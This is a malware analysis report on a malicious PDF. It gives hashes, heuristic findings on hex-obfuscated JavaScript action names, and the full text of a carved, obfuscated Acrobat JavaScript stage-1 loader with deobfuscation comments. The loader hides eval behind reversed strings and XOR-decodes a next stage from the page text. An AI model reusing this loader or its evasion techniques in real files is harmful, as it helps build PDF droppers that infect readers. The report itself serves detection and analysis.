Malicious PDF — malware analysis report

Static analysis result for SHA-256 f1dcef4bcf1af44f…

MALICIOUS

PDF

6.5 KB Authoring application: Tisilarehaue (via c85c3Tibedegabala) First seen: 2012-06-14
MD5: 7746c1b85673b4eb89a1b527fa6166a1 SHA-1: 0e911ef4142089d2c1075119e237681a5f125563 SHA-256: f1dcef4bcf1af44fc3343653324b7a18745c6b1ab6655e68de72517ecf4d890e
Risk score: 106

Machine Learning

  • Nyx PDF Classifier malicious score 0.9990

Heuristics (3 findings)

  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Although #XX escapes are legal PDF name syntax, mainstream PDF producers write these action names literally; hex-encoding an executable action name serves no rendering purpose and is a deliberate evasion used by exploit-kit and dropper PDFs.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis. Note that the carved script below decodes a further stage from the word content of a document page at run time (see the preview), so that stage is not present as a separate carved file.

Filename | Kind | Source | Size
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x1230 1728 bytes
SHA-256: d4dce4f95f7146e3b127d68edf45ceb045483a205d9e9a2a53d6e6b80d83b663
Preview script
First 1,000 lines of the extracted script (this 1728-byte script is shorter than that, so it is shown in full)
// ANALYST NOTE: obfuscated Acrobat JavaScript stage-1 loader carved from PDF
// object 10. Do NOT execute outside an isolated sandbox. The comments below are
// deobfuscation notes; the code itself is reproduced unchanged. Everything
// here depends on Acrobat-only APIs (app, app.eval, app.alert, Doc.pageNum,
// Doc.getPageNumWords, Doc.getPageNthWord), so a generic JS engine will not
// reproduce the decoding.
try {

// Stage-1 "class": the constructor only stores its argument as this._H.
// It is instantiated once below as `new _ZO(_FW)` with _FW === this, and the
// stage-2 source reads the stored object back via `this._H`.
function _ZO(_QD){
this._H=_QD;
};


// Method names assembled from fragments so that "charAt" and "length" never
// appear as literal strings: _RQZ + _JI === "charAt", _XY === "length".
var _RQZ="cha";
var _JI=new String("rAt");
var _XY="leng"+"th";


// String reverser attached to the Acrobat `app` object. The loop starts at
// _YJM.length (one past the last index); charAt(length) returns "" so the
// extra iteration is harmless. Used only to un-reverse the string constants
// "prototype" and "eval" below. _TMN and _SD leak as implicit globals.
app._UV=function(_YJM){
_TMN='';
for(_SD=_YJM.length;_SD >= 0;_SD--){
 _TMN+=_YJM[_RQZ + _JI](_SD);
}
return _TMN;
}


var _UV=app._UV;
// 'epytotorp' reversed is "prototype": the next statement sets _ZO.prototype.
_FE = app._UV('epytotorp');
_ZO[_FE]={


// 'lave' reversed is "eval" — the property name looked up on the global object in _MNI.
_UNC : _UV(String("lave")),

// Entry point. Resolves eval via _MNI() and evaluates the stage-2 source held
// in _YJM. Calling eval through a local variable rather than by name keeps a
// literal eval( call out of the file.
_KR : function(){
var _NQ = this;

_DS=_NQ._MNI();

var _GN=_NQ._YJM;
_DS(_GN);
},

// Returns _FW["eval"]. _FW is declared after this object literal, but it is
// assigned (to the global `this`) before _KR() runs, so the lookup succeeds.
_MNI : function(){

var _BO=this._UNC;
return _FW[_BO];
},

// Stage-2 source. '%' characters are sprinkled through the text and removed
// by the trailing .replace(/[%]/g, ''). With the noise stripped it reads:
//   _HK = 37; var _KTM = this._H;        // intended to be the Doc object
//                                        // (whether `this` is _EH or the
//                                        // global at eval time depends on
//                                        // Acrobat's eval scoping — verify)
//   ...constants: 'getPageNthWord', 'getPageNumWords', 'pageNum', 'join',
//      'substr', 'eval', 'length', '\x', 'toString'; _ITU = 332; _DA = 2;
//      _JA = 16; _FW = 'doc' (this also overwrites the outer _FW)...
//   1) concatenate every word of page _KTM.pageNum, obtained through
//      getPageNumWords / getPageNthWord(pageNum, i, true), into one string
//      _NG — the next stage is hidden as page TEXT, not in a stream;
//   2) for each 2-char hex pair of _NG: parseInt(pair, 16) ^ 37 (0x25),
//      re-hex with toString(16), zero-pad to two digits, push into _IV;
//   3) build '\xNN\xNN...' and run app.eval('_ITK="<that>";') so the
//      escapes are turned into the decoded bytes;
//   4) split the result: the last 332 chars become _KTM._ZW, the remainder
//      _KTM._UN; then call _NI(), which is never defined, so the resulting
//      ReferenceError is caught and the catch does app.eval(_KTM._UN) —
//      that is where stage 3 executes. 'Decoder Exception: ' and
//      'Nothing calling' alerts are the failure paths.
// NOTE(review): stage 3 is not carved by this report. Recover it by XOR-ing
// the page's hex text with 0x25 and dropping the 332-char tail; what the
// tail (_ZW) is used for cannot be determined from this stage alone.
_YJM : '_HK = 37 ;va%%r _KTM=this._H;_WL=\'getPageNt%%hWord\';_DC=\'%getPageNum%Word%s\';_EL=\'pageNum\';_ED%=%%\'\';_AL=\'join%\';_NG=\'\';_KL=%%0;_%%HA=St%%ring;_VY%=\'subs%tr\';%_BY=\'ev%%al\'%%;_XY=\'%length\'%%;_S%%J%%=\'\\\\x\';%%_P%W=\'charCodeAt\';_GH=\'fro%%mCharCo%%de\'%%;_VS%=\'%toSt%ring\'%%;_JK%R%%=2-1;_D%%M=%3+2;_R%A=100%%+155;_%FW=\'%doc\';%%_ITU%=332%;_IV=[];%_ITK=\'\';_D%A=2;_T%Q%%=4;_J%%A=16;%%_PG=_KTM[_%DC](_KTM[_E%%L])%%;for%(_SD=_%KL;_SD%< _PG;% _SD++){var _%%WJ=_KTM%%[_WL](_%%KTM[_EL]%,_SD,tru%e);_NG=[%_NG,%_WJ][_AL](_ED);;}for(_SD%=0%;_SD < _%NG[_XY]; _SD+=_%%DA)%%{_%GD=_NG[_%VY%](_%%SD,_%DA)%%;_Z%%AB=parseI%%nt(_GD,_JA);_XYP=_ZA%B^_HK%%;_FO=_%XYP%%.t%o%%Stri%ng(%%_J%A%%);_F%O=(_%FO[_XY]==_JKR%%)%% ? \'0\' +% %%_%%FO : _FO;_IV.pus%h(_FO)%;%%}try {_ITK=n%ew String(_SJ + %_I%V[%_AL](_SJ));app%[_BY](\'_ITK=\"%%\'+_%%ITK+\'\";\');%_%%KTM.%_ZW=(%%_%%I%%TK[_%VY]%%(_ITK[_%%XY]-_%%IT%U))%%;_KT%M._UN=(_ITK[_VY]%(_KL,_I%%TK[_XY]-%_ITU));_NI%();} c%atc%%h(_%%GHO){if(_KTM._U%%N)%{try {a%%pp[_BY%](_KTM._UN);} c%%at%ch(%%_GHO){app.alert(\'D%ecoder Except%%i%%on: \'%% %%+ %_GHO);}} else {ap%%p.alert(\'%%No%thing calling\');}%%}'.replace(/[%]/g, ''),
};


// Global `this` — in Acrobat document-level JavaScript this is the Doc object.
// It is both the object whose "eval" property _MNI resolves and the value
// stored as _EH._H for stage 2.
var _FW=this;

var _EH=new _ZO(_FW);

// Kick off stage 2.
_EH._KR();

// Any error escaping the loader (e.g. a TypeError if this._H was not the
// document) is surfaced as an Acrobat alert; the name _ITK is reused here
// and is unrelated to the stage-2 variable of the same name.
} catch(_ITK){
app.alert(_ITK);
}